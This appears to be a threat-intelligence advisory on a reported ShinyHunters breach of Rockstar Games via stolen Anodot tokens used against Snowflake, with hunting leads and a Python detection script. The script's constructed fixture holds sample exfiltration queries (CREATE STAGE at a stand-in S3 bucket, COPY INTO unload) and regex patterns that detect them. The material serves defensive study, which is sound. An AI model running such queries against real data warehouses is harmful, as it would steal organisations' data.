Shiny Hunters | Data Breach | Extortion | SaaS Compromise | Anodot
Source Material: Security Affairs | Technology: Anodot, Snowflake, SaaS Integrations, APIs | Targeted Industries: Gaming & Entertainment, Telecommunications, Technology & SaaS, Financial Services, Manufacturing, Energy & Utilities
Executive Summary
On April 11, 2026, the financially motivated cybercriminal group ShinyHunters announced they had breached Rockstar Games. Rather than directly attacking Rockstar’s infrastructure or exploiting a flaw in Snowflake, the attackers compromised Anodot, a software-as-a-service (SaaS) cloud analytics platform used by the game developer. By stealing authentication tokens from Anodot, the attackers were able to masquerade as a legitimate internal service and extract data directly from Rockstar’s Snowflake environment. Rockstar confirmed the incident, stating that only a limited amount of non-material company data was accessed and that player information remains unaffected. However, following the expiration of their April 14 ransom deadline, threat intelligence reports indicate ShinyHunters has begun releasing the stolen information, which allegedly includes corporate financial data.
Threat Overview and Strategic Impact
ShinyHunters is a well-known hacking group active since 2020, specializing in targeting identity systems, API keys, and third-party integrations to steal large datasets. In this campaign, they bypassed traditional perimeter defenses by targeting Anodot, a vendor with trusted access to Rockstar’s Snowflake instances. The stolen authentication tokens allowed the threat actors to conduct normal database export operations that blended in with regular administrative traffic, significantly delaying detection.
The strategic impact highlights the growing risk of supply chain and third-party integration vulnerabilities. While Rockstar Games maintains that the breach is limited to non-material internal assets and does not affect players or the upcoming release of Grand Theft Auto VI, the exposure of corporate documents, revenue splits, and platform agreements poses a significant reputational and operational risk. Furthermore, this incident is part of a broader campaign by ShinyHunters targeting Anodot and Salesforce integrations, affecting numerous other telecommunications and technology organizations globally.
Security Hardening and Recommendations
To protect against similar third-party integration compromises, organizations should implement the following measures:
- Token Management: Enforce strict, automated rotation for authentication tokens and API keys. Long-lived tokens present a significant risk if a trusted third party is breached.
- Principle of Least Privilege: Audit third-party SaaS permissions. Ensure applications like Anodot only possess the minimum read/write access necessary to function within cloud warehouses like Snowflake.
- Egress Monitoring: Implement robust monitoring for abnormal data extraction. Automatically flag or block sudden, massive data transfers to unrecognized IP addresses, even if the traffic originates from a trusted service account.
- Multi-Factor Authentication (MFA) and Conditional Access: Where supported, enforce MFA or conditional access policies (such as IP allowlisting) even for automated service accounts to limit the utility of stolen tokens. In Snowflake, this means attaching a network policy to the integration's service user that permits only the vendor's published IP ranges, so that a stolen token presented from any other address is refused at login.
Detection
Because this incident involved a third-party SaaS platform (Anodot) and a cloud data warehouse (Snowflake) accessed with legitimate authentication tokens, standard endpoint and network detections may not trigger. Organizations should monitor cloud audit logs (e.g., Snowflake access logs) for:
- Unusual data export volumes initiated by service accounts.
- Logins from unexpected geographic locations or untrusted IP ranges using valid third-party tokens.
How Deepwatch Protects Our Customers
- Detection: We are reviewing existing detections associated with the identified TTPs to ensure coverage, developing new detections as applicable, and raising awareness of related alerting within our SOC.
- Threat Intelligence: Our teams are reviewing TTPs, related reporting, and monitoring for IOCs to feed into our detection platform.
Threat Hunting Leads
- Anomalous Source IPs for Service Accounts: Review cloud data warehouse access logs (e.g., Snowflake LOGIN_HISTORY) for successful authentications by third-party service accounts originating from IP addresses or ASNs outside of the vendor’s historically observed baseline or published IP ranges.
- Data Export Volume Spikes: Analyze database query logs (e.g., Snowflake QUERY_HISTORY) for an unusually high volume of data extraction commands (such as massive SELECT statements or COPY INTO commands) executed by SaaS integration accounts.
- Unauthorized External Stage Creation: Monitor cloud environments for the sudden creation of new, unrecognized external storage stages or data shares. Attackers may attempt to route stolen data to their own AWS S3 or Azure Blob storage buckets using native database commands.
- User-Agent Anomalies: Investigate API authentication logs for service accounts using unexpected or generic User-Agent strings (e.g., standard Python scripts, cURL, or Postman) rather than the expected proprietary User-Agent of the trusted third-party application.
- Off-Hours Service Account Activity: Baseline the normal operational hours and frequency of third-party monitoring tools (like Anodot). Alert on sudden, sustained spikes in activity or data queries occurring outside of these expected automated windows.
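The following script is an added example, not Deepwatch's, Anodot's or Snowflake's code, showing how the audit-log checks from the Detection section and the five hunting leads above can be run together over exported Snowflake rows. The rows are constructed for the example and mimic a few columns of the SNOWFLAKE.ACCOUNT_USAGE.LOGIN_HISTORY and QUERY_HISTORY views; the service account name ANODOT_SVC, the published CIDR, the expected driver type and the nightly collection window are assumptions, not Anodot's real values.

```python
"""Hunt for abuse of a third-party integration's Snowflake service account.
Added example, not Deepwatch's, Anodot's or Snowflake's code.  Rows are CONSTRUCTED to
mimic a few columns of SNOWFLAKE.ACCOUNT_USAGE.LOGIN_HISTORY / QUERY_HISTORY; the
account name, IP ranges, driver type and collection window are assumptions."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed vendor baseline (hypothetical values, not Anodot's real ones)
VENDOR_ACCOUNT = "ANODOT_SVC"
VENDOR_PUBLISHED_CIDRS = [ipaddress.ip_network("203.0.113.0/24")]  # TEST-NET-3 placeholder
EXPECTED_CLIENT_TYPES = {"JDBC_DRIVER"}    # driver the integration normally presents
EXPECTED_HOURS_UTC = range(1, 4)           # nightly collection window 01:00-03:59 UTC
T0 = datetime(2026, 4, 1, 2, 0)            # constructed reference timestamp

def login(eid, when, ip, client, ok="YES"):
    """Build a LOGIN_HISTORY-shaped row (constructed test data)."""
    return {"EVENT_ID": eid, "EVENT_TIMESTAMP": when, "USER_NAME": VENDOR_ACCOUNT,
            "CLIENT_IP": ip, "REPORTED_CLIENT_TYPE": client, "IS_SUCCESS": ok}

def query(qid, when, text, result_bytes=0, unload_bytes=0):
    """Build a QUERY_HISTORY-shaped row (constructed test data)."""
    return {"QUERY_ID": qid, "START_TIME": when, "USER_NAME": VENDOR_ACCOUNT, "QUERY_TEXT": text,
            "BYTES_WRITTEN_TO_RESULT": result_bytes, "OUTBOUND_DATA_TRANSFER_BYTES": unload_bytes}

DAY2 = T0 + timedelta(days=2, hours=10)    # 12:00 UTC, outside the nightly window
# Two normal nightly logins, then a login from an unrelated address with a different
# driver, plus a failed attempt from the same place.
LOGIN_HISTORY = [
    login(1, T0, "203.0.113.10", "JDBC_DRIVER"),
    login(2, T0 + timedelta(days=1), "203.0.113.11", "JDBC_DRIVER"),
    login(3, DAY2, "198.51.100.7", "PYTHON_DRIVER"),
    login(4, DAY2 + timedelta(minutes=1), "198.51.100.7", "PYTHON_DRIVER", ok="NO"),
]
# ~50 MB nightly pulls, then a full-table dump, an external stage at an unknown bucket,
# and an unload into it.
QUERY_HISTORY = [
    query("q1", T0, "SELECT day, cost FROM billing.daily_cost WHERE day = CURRENT_DATE()", 50_000_000),
    query("q2", T0 + timedelta(days=1), "SELECT day, cost FROM billing.daily_cost WHERE day = CURRENT_DATE()", 50_000_000),
    query("q3", DAY2, "SELECT * FROM finance.contracts", 8_000_000_000),
    query("q4", DAY2 + timedelta(minutes=2), "CREATE STAGE out URL='s3://unknown-bucket/' CREDENTIALS=(AWS_KEY_ID='...' AWS_SECRET_KEY='...')"),
    query("q5", DAY2 + timedelta(minutes=3), "COPY INTO @out/contracts FROM finance.contracts", unload_bytes=8_000_000_000),
]

STAGE_OR_SHARE = re.compile(r"\bCREATE\s+(?:OR\s+REPLACE\s+)?(?:STAGE|SHARE)\b", re.I)
UNLOAD_TO_EXTERNAL = re.compile(r"\bCOPY\s+INTO\s+(?:@|'?(?:s3|azure|gcs)://)", re.I)

def anomalous_logins(rows, user, cidrs):
    """Lead 1: successful logins for `user` from outside the vendor's published ranges."""
    return [r["EVENT_ID"] for r in rows
            if r["USER_NAME"] == user and r["IS_SUCCESS"] == "YES"
            and not any(ipaddress.ip_address(r["CLIENT_IP"]) in net for net in cidrs)]

def client_type_anomalies(rows, user, expected):
    """Lead 4: login attempts (successful or not) using a driver the vendor does not use."""
    return [r["EVENT_ID"] for r in rows
            if r["USER_NAME"] == user and r["REPORTED_CLIENT_TYPE"] not in expected]

def daily_egress_bytes(rows, user):
    """Bytes returned to the client plus bytes unloaded out of Snowflake, per calendar day."""
    per_day = defaultdict(int)
    for r in rows:
        if r["USER_NAME"] == user:
            per_day[r["START_TIME"].date()] += r["BYTES_WRITTEN_TO_RESULT"] + r["OUTBOUND_DATA_TRANSFER_BYTES"]
    return dict(per_day)

def egress_spikes(rows, user, multiplier=10):
    """Lead 2: days whose egress exceeds `multiplier` x the median of the other days."""
    per_day = daily_egress_bytes(rows, user)
    spikes = []
    for day, total in per_day.items():
        others = sorted(v for d, v in per_day.items() if d != day)
        if others and total > multiplier * others[len(others) // 2]:
            spikes.append(day)
    return sorted(spikes)

def stage_or_unload_commands(rows, user):
    """Lead 3: stage/share creation, or unloads to a stage or cloud URL, by the integration."""
    return [r["QUERY_ID"] for r in rows if r["USER_NAME"] == user and
            (STAGE_OR_SHARE.search(r["QUERY_TEXT"]) or UNLOAD_TO_EXTERNAL.search(r["QUERY_TEXT"]))]

def off_hours_queries(rows, user, expected_hours):
    """Lead 5: queries started outside the integration's normal automated window."""
    return [r["QUERY_ID"] for r in rows
            if r["USER_NAME"] == user and r["START_TIME"].hour not in expected_hours]

def hunt(login_rows=LOGIN_HISTORY, query_rows=QUERY_HISTORY, user=VENDOR_ACCOUNT):
    """Run all five leads; one lead alone is weak evidence, overlap between them is the signal."""
    return {"anomalous_source_ip": anomalous_logins(login_rows, user, VENDOR_PUBLISHED_CIDRS),
            "unexpected_client_type": client_type_anomalies(login_rows, user, EXPECTED_CLIENT_TYPES),
            "egress_spike_days": [str(d) for d in egress_spikes(query_rows, user)],
            "stage_or_unload": stage_or_unload_commands(query_rows, user),
            "off_hours": off_hours_queries(query_rows, user, EXPECTED_HOURS_UTC)}

if __name__ == "__main__":
    for lead, finding in hunt().items():
        print(f"{lead}: {finding}")
```

On the constructed data every lead fires on the same third day: the login from 198.51.100.7 with a Python driver, a 16 GB egress day against a 50 MB baseline, a CREATE STAGE pointing at a bucket the organization does not own, and a COPY INTO unload at midday. In practice, replace the constructed rows with an export of the real ACCOUNT_USAGE views and feed the vendor's actual published ranges into VENDOR_PUBLISHED_CIDRS; the median-based spike threshold assumes at least a couple of days of baseline for the account.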
Technical Artifacts
At this time, specific Indicators of Compromise (IoCs) such as malicious IP addresses or file hashes have not been publicly disclosed, as the attackers utilized legitimate authentication tokens and abused native database export features to evade initial detection. The Deepwatch Threat Intel team will continue to monitor for related IOCs and add them to our threat intelligence platform to feed alerting as they become available.
Threat Object Mapping
Intrusion Set: ShinyHunters
Attack Pattern (MITRE ATT&CK):
| Tactic | Technique | Technique ID | Associated Threat Activity |
|---|---|---|---|
| Initial Access | Compromise Supply Chain | T1195 | The threat actors compromised Anodot, a third-party cloud cost monitoring tool, to bypass Rockstar’s primary perimeter defenses. |
| Credential Access | Steal Application Access Token | T1528 | Attackers extracted authentication tokens from the compromised Anodot environment that were trusted by Rockstar’s infrastructure. |
| Initial Access, Persistence, Defense Evasion | Valid Accounts: Cloud Accounts | T1078.004 | ShinyHunters used the stolen Anodot SaaS tokens to seamlessly authenticate into Rockstar’s Snowflake data warehouses, masquerading as a legitimate service. |
| Collection | Data from Cloud Storage | T1530 | The attackers targeted and collected corporate, financial, and marketing data stored within the Snowflake cloud environment. |
| Exfiltration | Exfiltration Over Web Service | T1567 | Data was exfiltrated using native database export features, blending in with standard administrative traffic to evade detection. |
Vulnerability:
- None explicitly identified / No CVEs disclosed.
- The attackers did not exploit a traditional software vulnerability in Rockstar’s or Snowflake’s infrastructure. Instead, they compromised a trusted third-party vendor (Anodot) to steal valid SaaS authentication tokens, exploiting the broad access policies of the integration itself.
Malware/Tools:
- No specific malware identified.
- The attackers utilized a “Living off the Land” (LotL) approach. By using the stolen authentication tokens, they masqueraded as a legitimate service and abused native database tools and export features within Snowflake to extract the data.
Additional Sources
- Rockstar Games receives “pay or leak” warning after cyberattack
- GTA 6 Developer Rockstar Reportedly Hacked, Data Being Ransomed
- ShinyHunters Claims Rockstar Games Snowflake Breach via Anodot
- ShinyHunters Claims Massive Rockstar Games Breach Via Anodot-Snowflake Integration
- Rockstar Games: ShinyHunters Ransomware Attack & Data Breach 2026